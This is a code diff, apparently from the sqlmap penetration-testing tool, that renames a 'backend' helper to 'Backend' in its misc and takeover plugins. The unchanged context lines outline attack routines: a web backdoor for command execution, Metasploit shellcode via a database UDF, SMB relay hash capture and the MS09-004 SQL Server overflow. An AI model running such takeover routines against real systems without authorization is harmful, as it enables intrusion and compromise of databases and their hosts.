--- a/plugins/generic/misc.py
+++ b/plugins/generic/misc.py
@@ -10,7 +10,7 @@ See the file 'doc/COPYING' for copying permission
import re
from lib.core.common import getCompiledRegex
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import isTechniqueAvailable
from lib.core.common import normalizePath
from lib.core.common import ntToPosixSlashes
@@ -57,19 +57,19 @@ class Miscellaneous:
infoMsg = "detecting back-end DBMS version from its banner"
logger.info(infoMsg)
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
first, last = 1, 6
- elif backend.getIdentifiedDbms() == DBMS.PGSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.PGSQL:
first, last = 12, 6
- elif backend.getIdentifiedDbms() == DBMS.MSSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
first, last = 29, 9
else:
raise sqlmapUnsupportedFeatureException, "unsupported DBMS"
- query = queries[backend.getIdentifiedDbms()].substring.query % (queries[backend.getIdentifiedDbms()].banner.query, first, last)
+ query = queries[Backend.getIdentifiedDbms()].substring.query % (queries[Backend.getIdentifiedDbms()].banner.query, first, last)
if conf.direct:
query = "SELECT %s" % query
@@ -120,7 +120,7 @@ class Miscellaneous:
if not onlyFileTbl:
inject.goStacked("DROP TABLE %s" % self.cmdTblName, silent=True)
- if backend.getIdentifiedDbms() == DBMS.MSSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MSSQL:
return
if udfDict is None:
@@ -133,7 +133,7 @@ class Miscellaneous:
if not output or output in ("y", "Y"):
dropStr = "DROP FUNCTION %s" % udf
- if backend.getIdentifiedDbms() == DBMS.PGSQL:
+ if Backend.getIdentifiedDbms() == DBMS.PGSQL:
inp = ", ".join(i for i in inpRet["input"])
dropStr += "(%s)" % inp
diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py
index 8d07af381..425b8f215 100644
--- a/plugins/generic/takeover.py
+++ b/plugins/generic/takeover.py
@@ -9,7 +9,7 @@ See the file 'doc/COPYING' for copying permission
import os
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import isTechniqueAvailable
from lib.core.common import readInput
from lib.core.common import runningAsAdmin
@@ -45,7 +45,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
def osCmd(self):
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) or conf.direct:
web = False
- elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and backend.getIdentifiedDbms() == DBMS.MYSQL:
+ elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and Backend.getIdentifiedDbms() == DBMS.MYSQL:
infoMsg = "going to use a web backdoor for command execution"
logger.info(infoMsg)
@@ -66,7 +66,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
def osShell(self):
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) or conf.direct:
web = False
- elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and backend.getIdentifiedDbms() == DBMS.MYSQL:
+ elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and Backend.getIdentifiedDbms() == DBMS.MYSQL:
infoMsg = "going to use a web backdoor for command prompt"
logger.info(infoMsg)
@@ -149,7 +149,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
errMsg += "is unlikely to receive commands send from you"
logger.error(errMsg)
- if backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+ if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
self.sysUdfs.pop("sys_bineval")
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) or conf.direct:
@@ -159,7 +159,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
self.initEnv(web=web)
if tunnel == 1:
- if backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+ if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
msg = "how do you want to execute the Metasploit shellcode "
msg += "on the back-end database underlying operating system?"
msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)"
@@ -189,7 +189,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
self.uploadMsfPayloadStager()
if kb.os == "Windows" and conf.privEsc:
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
debugMsg = "by default MySQL on Windows runs as SYSTEM "
debugMsg += "user, no need to privilege escalate"
logger.debug(debugMsg)
@@ -207,7 +207,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
self.uploadIcmpshSlave(web=web)
self.icmpPwn()
- elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and backend.getIdentifiedDbms() == DBMS.MYSQL:
+ elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and Backend.getIdentifiedDbms() == DBMS.MYSQL:
web = True
infoMsg = "going to use a web backdoor to establish the tunnel"
@@ -256,13 +256,13 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
raise sqlmapUnsupportedDBMSException(errMsg)
if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct:
- if backend.getIdentifiedDbms() in ( DBMS.PGSQL, DBMS.MSSQL ):
+ if Backend.getIdentifiedDbms() in ( DBMS.PGSQL, DBMS.MSSQL ):
errMsg = "on this back-end DBMS it is only possible to "
errMsg += "perform the SMB relay attack if stacked "
errMsg += "queries are supported"
raise sqlmapUnsupportedDBMSException(errMsg)
- elif backend.getIdentifiedDbms() == DBMS.MYSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.MYSQL:
debugMsg = "since stacked queries are not supported, "
debugMsg += "sqlmap is going to perform the SMB relay "
debugMsg += "attack via inference blind SQL injection"
@@ -271,19 +271,19 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
printWarn = True
warnMsg = "it is unlikely that this attack will be successful "
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
warnMsg += "because by default MySQL on Windows runs as "
warnMsg += "Local System which is not a real user, it does "
warnMsg += "not send the NTLM session hash when connecting to "
warnMsg += "a SMB service"
- elif backend.getIdentifiedDbms() == DBMS.PGSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.PGSQL:
warnMsg += "because by default PostgreSQL on Windows runs "
warnMsg += "as postgres user which is a real user of the "
warnMsg += "system, but not within the Administrators group"
- elif backend.getIdentifiedDbms() == DBMS.MSSQL and backend.isVersionWithin(("2005", "2008")):
- warnMsg += "because often Microsoft SQL Server %s " % backend.getVersion()
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL and Backend.isVersionWithin(("2005", "2008")):
+ warnMsg += "because often Microsoft SQL Server %s " % Backend.getVersion()
warnMsg += "runs as Network Service which is not a real user, "
warnMsg += "it does not send the NTLM session hash when "
warnMsg += "connecting to a SMB service"
@@ -300,14 +300,14 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct:
return
- if not backend.getIdentifiedDbms() == DBMS.MSSQL or not backend.isVersionWithin(("2000", "2005")):
+ if not Backend.getIdentifiedDbms() == DBMS.MSSQL or not Backend.isVersionWithin(("2000", "2005")):
errMsg = "the back-end DBMS must be Microsoft SQL Server "
errMsg += "2000 or 2005 to be able to exploit the heap-based "
errMsg += "buffer overflow in the 'sp_replwritetovarbin' "
errMsg += "stored procedure (MS09-004)"
raise sqlmapUnsupportedDBMSException(errMsg)
- infoMsg = "going to exploit the Microsoft SQL Server %s " % backend.getVersion()
+ infoMsg = "going to exploit the Microsoft SQL Server %s " % Backend.getVersion()
infoMsg += "'sp_replwritetovarbin' stored procedure heap-based "
infoMsg += "buffer overflow (MS09-004)"
logger.info(infoMsg)